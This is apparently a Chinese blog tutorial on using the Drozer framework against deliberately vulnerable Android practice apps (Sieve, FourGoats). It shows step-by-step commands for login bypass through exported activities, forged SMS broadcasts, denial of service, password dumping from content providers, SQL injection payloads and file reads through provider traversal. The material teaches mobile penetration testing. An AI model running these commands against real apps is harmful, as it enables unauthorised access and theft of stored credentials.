Android安全测试框架Drozer(使用篇)

一、运行APP

在模拟器中运行drozer Agent App,并打开Embbdded Server。

二、ADB查看模拟器

打开命令行工具,并cd切换到安卓模拟器的安装路径D:\Program Files\Microvirt\MEmu,运行adb devices命令,查看是否能看到模拟器。如果看不到,重启模拟器试试。

三、进入Drozer控制台

使用 adb 进行端口转发,转发到上边Drozer使用的端口 31415,并进入Drozer 控制台:

adb forward tcp:31415 tcp:31415
drozer console connect
image.png

四、Drozer基本命令

4.1 列出模拟器设备中所有已经安装的App包列表
run app.package.list

注意:如果用run app.package.list 命令看不到安装的包,可以尝试通过用 adb命令查看所有安装的包。找到需要测试的包名以后,复制包名到下边的操作中

adb shell 
pm list packages
4.2 列举APP的详细信息

利用关键词“sieve”进行搜索得出包名:

dz> run app.package.list -f sieve
com.mwr.example.sieve
dz> 

查看包信息:

run app.package.info -a  com.mwr.example.sieve
image.png

通过上述方式,我们已经获得应用数据目录、apk的路径、UID、GID等信息。

五、Drozer安全测试

5.1 查看sieve的可攻击点
run app.package.attacksurface com.mwr.example.sieve
image.png
5.2 activity组件

应用程序中,一个Activity通常就是一个单独的屏幕,它上面可以显示一些控件也可以监听并处理用户的事件做出响应。 Activity之间通过Intent进行通信。在Intent的描述结构中,有两个最重要的部分:动作和动作对应的数据。

通过上边的命令可以发现activity存在问题,我们查看下用apktool反编译出的的安装包的AndroidManifest.xml文件,可看到将activity的exported设置为true。说明存在被导出的分险

image
5.2.1 查看对外的activity组件信息
run app.activity.info -a com.mwr.example.sieve
image.png
5.2.2 使用app.activity.start进行漏洞测试

越权漏洞--绕过登录界面导致可直接访问Your Passwords界面,说明存在越权漏洞。

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
image.png
5.3 Broadcast组件

BroadcastReceive广播接收器应用可以使用它对外部事件进行过滤只对感兴趣的外部事件(如当电话呼入时,或者数据网络可用时)进行接收并做出响应。广播接收器没有用户界面。然而,它们可以启动一个activity或serice 来响应它们收到的信息,或者用NotificationManager来通知用户。通知可以用很多种方式来吸引用户的注意力──闪动背灯、震动、播放声音等。一般来说是在状态栏上放一个持久的图标,用户可以打开它并获取消息。

下面使用fourgoats.apk测试Broadcast。查看fourgoats该APP的可攻击点,可以看到存在broadcast广播问题。

run app.package.attacksurface org.owasp.goatdroid.fourgoats
image
5.3.1 使用app.activity.start进行漏洞测试查看对外的broadcast组件信息
run app.broadcast.info -a org.owasp.goatdroid.fourgoats
image
5.3.2 查看反编译出的AndroidManifest.xml文件,可看到将receiver的exported设置未进行设置。说明存在越权问题,可发送恶意广播,伪造消息等等。
image

反编译查看源代码,发现需要两个参数phoneNumber和message。

image
5.3.3 漏洞利用,可发送恶意广播包

发送恶意广播

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message pwnd!
5.3.4漏洞利用,拒绝服务攻击检测

尝试拒绝服务攻击检测,向广播组件发送不完整intent使用空extras,可看到应用停止运行。

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS
image
5.4 Services组件

一个Service 是一段长生命周期的,没有用户界面的程序,可以用来开发如监控类程序。较好的一个例子就是一个正在从播放列表中播放歌曲的媒体播放器。在一个媒体播放器的应用中,应该会有多个activity,让使用者可以选择歌曲并播放歌曲。

然而,音乐重放这个功能并没有对应的activity,因为使用者当然会认为在导航到其它屏幕时音乐应该还在播放的。在这个例子中,媒体播放器这个activity 会使用Context.startService()来启动一个service,从而可以在后台保持音乐的播放。同时,系统也将保持这个service 一直执行,直到这个service 运行结束。

另外,我们还可以通过使用Context.bindService()方法,连接到一个service 上(如果这个service 还没有运行将启动它)。当连接到一个service 之后,我们还可以service 提供的接口与它进行通讯。拿媒体播放器这个例子来说,我们还可以进行暂停、重播等操作。 intent-filter未将exported设置为false,默认是可以导出的。

image

org.owasp.fourgoats.goatdroid.LocationService服务被导出,不需要任何权限。所以这意味着任何与FourGoats应用程序安装在设备上的恶意应用程序可以访问设备的位置。

5.4.1 让我们尝试启动特定服务
run app.package.attacksurface org.owasp.goatdroid.fourgoats
image

查看services信息

run app.service.info -a org.owasp.goatdroid.fourgoats

启动相关服务

run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService

观察状态栏中的位置标志和GPS位置正在由FourGoats应用程序访问

image
5.5 Content组件

android平台提供了Content Provider使一个应用程序的指定数据集提供给其他应用程序。这些数据可以存储在文件系统中、在一个SQLite数据库、或以任何其他合理的方式。其他应用可以通过ContentResolver类从该内容提供者中获取或存入数据。只有需要在多个应用程序间共享数据是才需要内容提供者。

image
5.5.1 信息泄露利用
  • 扫描并获取Content Provider信息,并列出了可访问内容URI的列表和路径:
run scanner.provider.finduris -a com.mwr.example.sieve
image.png
  • 查询或修改数据库中的数据,发现存在数据泄露问题,访问uri可看到一些敏感信息
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
image.png
5.5.2 SQL注入漏洞

同样content可能导致注入问题。使用以下语句进行测试发现报错,说明存在SQL注入漏洞。

 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'" 

 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'" 
image.png
  • 列出所有表信息
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM SQLITE_MASTER WHERE type='table';--" 
image.png
  • 获取具体表信息
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM Key;--"
image.png
  • 同时也可以使用扫描功能对该app注入点位置进行扫描
run scanner.provider.injection -a  com.mwr.example.sieve
image.png
  • 列出该app的表信息
run scanner.provider.sqltables -a  com.mwr.example.sieve
image.png
5.5.3 底层文件系统读取和写入(有可能被阻止)
  • 文件读取
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
image.png
  • 文件下载
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data

没有执行成功,执行成功后应该回显以下内容:

/data/com.mwr.example.sieve/databases/database.db /home/user/database.db 
Written 24576 bytes
5.5.4 目录遍历

目录遍历漏洞

 run scanner.provider.traversal -a com.mwr.example.sieve
image.png

--------------------------------------------------------------------------------------------------------------------------------

Drozer 使用指南

更多Drozer使用方法可参阅官方指南(英文): Drozer 使用指南

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,504评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,434评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,089评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,378评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,472评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,506评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,519评论 3 413
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,292评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,738评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,022评论 2 329
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,194评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,873评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,536评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,162评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,413评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,075评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,080评论 2 352

推荐阅读更多精彩内容